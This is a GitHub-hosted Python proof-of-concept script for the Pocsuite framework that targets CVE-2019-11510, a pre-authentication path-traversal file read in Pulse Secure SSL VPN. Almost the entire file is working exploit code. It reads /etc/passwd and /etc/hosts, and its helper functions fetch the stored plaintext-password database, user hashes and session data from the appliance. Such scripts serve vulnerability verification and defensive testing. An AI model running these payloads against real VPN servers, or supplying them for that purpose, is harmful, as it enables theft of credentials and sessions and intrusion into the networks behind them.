-
Notifications
You must be signed in to change notification settings - Fork 14
/
Copy pathpoc.py
132 lines (118 loc) · 5.15 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/8/22 14:15
# @Author : 兀
# @File : CVE-2019-11510.py
# @Software: PyCharm
# @Blog : https://3.1415926.top
# Life is Fantastic.
import urlparse
from pocsuite.api.poc import POCBase
from pocsuite.api.poc import register
from pocsuite.api.poc import Output
from pocsuite.api.request import req
class TestPOC(POCBase):
vulID = 'CVE-2019-11510'
version = '1'
author = '兀'
vulDate = '2019-08-10'
createDate = '2019-08-14'
updateDate = '2019-08-14'
references = [
"https://hackerone.com/reports/591295",
"https://github.com/projectzeroindia/CVE-2019-11510/blob/master/CVE-2019-11510.sh",
"https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html"
]
name = 'Pulse Secure SSL VPN Pre-auth'
appPowerLink = 'https://www.pulsesecure.net/'
appName = 'Pulse Secure SSL VPN '
appVersion = '''
8.1R15.1 / 8.2 / 8.3 / 9.0
'''
vulType = ''
desc = '''
'''
samples = [
]
install_requires = ""
def _attack(self):
return self._verify()
def _verify(self):
result = {}
self.raw_url = self.url
host = urlparse.urlparse(self.url).hostname
port = urlparse.urlparse(self.url).port
scheme = urlparse.urlparse(self.url).scheme
if port is None:
port = "80"
else:
port = str(port)
if "https" == scheme:
self.url = "%s://%s" % (scheme, host)
else:
self.url = "%s://%s:%s" % (scheme, host, port)
paylaod = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
headers = {"User-Agent": "Mozilla/5.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close",
"Upgrade-Insecure-Requests": "1"}
try:
res = req.get(self.url + paylaod, verify=False, headers=headers, timeout=(10, 15))
if "root:x:0:0:root" in res.text and res.status_code == 200:
result["VerifyInfo"] = {}
result["VerifyInfo"]["URL"] = self.url
result["VerifyInfo"]["passwd"] = res.text
result["VerifyInfo"]["host"] = self.get_hosts()
except Exception as e:
pass
return self.parse_output(result)
def get_hosts(self):
payload = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/"
headers = {"User-Agent": "Mozilla/5.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close",
"Upgrade-Insecure-Requests": "1"}
try:
res = req.get(self.url + payload, verify=False, headers=headers, timeout=(10, 15))
return res.text
except Exception as e:
return None
def get_user_password(self):
payload_palntext_passwd = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?" \
"/dana/html5acc/guacamole/"
payload_user_hash = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?" \
"/dana/html5acc/guacamole/"
headers = {"User-Agent": "Mozilla/5.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close",
"Upgrade-Insecure-Requests": "1"}
try:
plantextpasswd = req.get(self.url + payload_palntext_passwd, verify=False, headers=headers,
timeout=(10, 15)).text
except Exception as e:
plantextpasswd = ''
try:
userhash = req.get(self.url + payload_user_hash, verify=False, headers=headers, timeout=(10, 15)).text
except Exception as e:
userhash = ''
return plantextpasswd, userhash
def get_session(self):
payload = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/" \
"data.mdb?/dana/html5acc/guacamole/"
headers = {"User-Agent": "Mozilla/5.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close",
"Upgrade-Insecure-Requests": "1"}
try:
res = req.get(self.url + payload, verify=False, headers=headers, timeout=(10, 15))
return res.text
except Exception as e:
return ""
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)